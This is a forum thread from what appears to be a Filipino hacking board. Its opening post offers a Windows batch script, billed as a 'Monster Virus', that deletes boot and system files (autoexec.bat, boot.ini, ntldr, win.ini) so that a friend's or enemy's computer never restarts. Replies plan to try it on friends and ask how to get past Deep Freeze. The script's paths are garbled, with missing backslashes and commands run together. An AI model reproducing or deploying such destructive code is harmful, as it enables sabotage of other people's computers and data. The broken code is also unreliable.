WELCOME TO pinoyhackerz.drkbb.com

WELCOME TO pinoyhackerz.drkbb.com
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Philippine hacks

HomePortalLatest imagesRegisterLog in
Navigation
 Portal
 Index
 Memberlist
 FAQ
 Search
Search

Display results as :

Rechercher Advanced Search
Latest topics
» Get a private watchdog tech
Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 31, 2023 9:03 pm by chriz101

Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 31, 2023 9:02 pm by chriz101

Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 31, 2023 9:01 pm by chriz101

Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 31, 2023 8:59 pm by chriz101

Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 31, 2023 8:58 pm by chriz101

» You need MONEY
Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 24, 2023 6:25 pm by chriz101

» Do you need MONEY?
Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 24, 2023 6:14 pm by chriz101

» Do you need MONEY?
Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 24, 2023 6:11 pm by chriz101

» Contact me if you need urgent MONEY
Destroy any computer easily with one click using notepad I_icon_minitimeThu Aug 24, 2023 6:11 pm by chriz101

Forum
Top posters
chriz101
Destroy any computer easily with one click using notepad I_vote_lcapDestroy any computer easily with one click using notepad I_voting_barDestroy any computer easily with one click using notepad I_vote_rcap 
benchy
Destroy any computer easily with one click using notepad I_vote_lcapDestroy any computer easily with one click using notepad I_voting_barDestroy any computer easily with one click using notepad I_vote_rcap 
solutiongiver
wocash2015
jinghost
PHZ-**reaganlat**
balzz321
alvarez1
soulfly999
kidlat

Destroy any computer easily with one click using notepad

Go down 
5 posters
AuthorMessage
kidlat

kidlat

Destroy any computer easily with one click using notepad Empty
PostSubject: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitimeFri Mar 22, 2013 7:48 pm

Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances because the file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed

@echo off
attrib -r -s -h
c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini del c:windowswin.ini

And SAVE this file as .bat Now that’s it ur Virus is ready well it’s a Monster Virus . Remember Don’t click on this file in ur Computer
Back to top Go down
soulfly999

PostSubject: Re: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitimeFri Apr 26, 2013 11:27 am

hehehehehheheh.....................Thanks dito.... ma try nga sa Barkada ko...............
Back to top Go down
brookebones

PostSubject: Re: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitimeWed May 08, 2013 4:54 pm

pano kung naka deep freezed?
Back to top Go down
tamtam

PostSubject: Re: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitimeSat May 18, 2013 1:55 pm

boss pnu procedure ayaw sa ultimate w7 eh
thakxxx
Back to top Go down
revivesoul88

PostSubject: Re: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitimeFri Jun 26, 2015 11:17 am

pano kung naka deepfreeze?
Back to top Go down
Sponsored content

PostSubject: Re: Destroy any computer easily with one click using notepad   Destroy any computer easily with one click using notepad I_icon_minitime

Back to top Go down

Destroy any computer easily with one click using notepad
Page 1 of 1